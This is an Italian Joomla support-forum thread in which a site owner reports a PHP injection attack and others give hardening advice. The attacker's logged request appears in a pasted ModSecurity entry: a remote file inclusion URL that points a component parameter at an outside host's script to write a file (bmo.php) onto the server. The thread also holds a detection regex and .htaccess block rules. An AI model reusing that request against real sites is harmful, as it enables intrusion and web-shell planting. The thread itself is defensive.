PHP Injection Attack

[unsu82]

Salve a Tutti,
ho realizzato quanche mese fa un sito con Joomla 1.0.11 e docmanV13-RC2.
Tutto OK fino a qualche giorno fa, fino a quando non è stato + possibile accedere al sito.
Allora ho contattato colui che fornisce il servizio di hosting e mi ha detti che c'è stato un "PHP Injection Attack". 
Questo è quello che ha trovato in ModSecurity di Apache:

---

[Sun Oct 07 20:10:36 2007] [error] [client 193.93.98.197] ModSecurity:
Access
nied with code 501 (phase 2). Pattern match
"(??:\\\\b(?:f(?:tp_(?:nb_)?f?(
e|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(??:encod|writ)e|compress|open
ad)|s(?:ession_start|candir)|read(??:gz)?file|dir)|move_uploaded_file|(?:pr
|bz)open)|\\\\$_(??:pos|ge)t|session))\\\\b|<\\\\?(?!xml))" at
ARGS:S1. [id
50013"] [msg "PHP Injection Attack. Matched signature <<?>"] [severity
"CRITI
"] [hostname "www.xxx.it"] [uri
"/components/com_extcalend
admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://andravarldar.se/cmd?&action
=save&chdir=/home/xxx/components/com_docman/&file=bmo.p
hp"] [unique_id "DXl7NUUpok8AAF3IJu0AAAAG"]

----

Questa è la directory dove è stato caricato il phishing:

/home/xxx/components/com_docman/

Adesso però sono abbastanza preoccupato xkè mi ha detto che devo ripulire il sito, altrimenti lo rigetta.
Ho cercato con google ma non ho trovato niente, mi ha detto che devo risolvere il bug, ma non cosa fare se non altro che eliminare lo script di phishing inserito che è nominato bmo.php e bmo.html.

Grazie a chiunque sappia aiutarmi! 

[Luca Curatola]

Aggiorna la versione di joomla, aggiorna le versioni dei componenti installati, metti in sola lettura il file configuration.php e aggiungi nel file .htaccess nella root del sito (se non c'e' crealo) questo codice:

Codice: [Seleziona]

########## Begin - Rewrite rules to block out some common exploits
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits


[unsu82]

Grazie Tantissime Provo Subito!

[gt_67]

Grazie del suggerimento ! lo faccio anche io subito.

Mi sono accorto di avere un file htaccess.txt e non un file .htaccess ...pensavo di essere protetto ed invece ...

Grazie davvero di cuore !

[surfbit]

ciao neoviruz queste informazioni non sarebbe male raccoglierle nel joomwiki, in questo modo non si perderanno nei 129165 messaggi.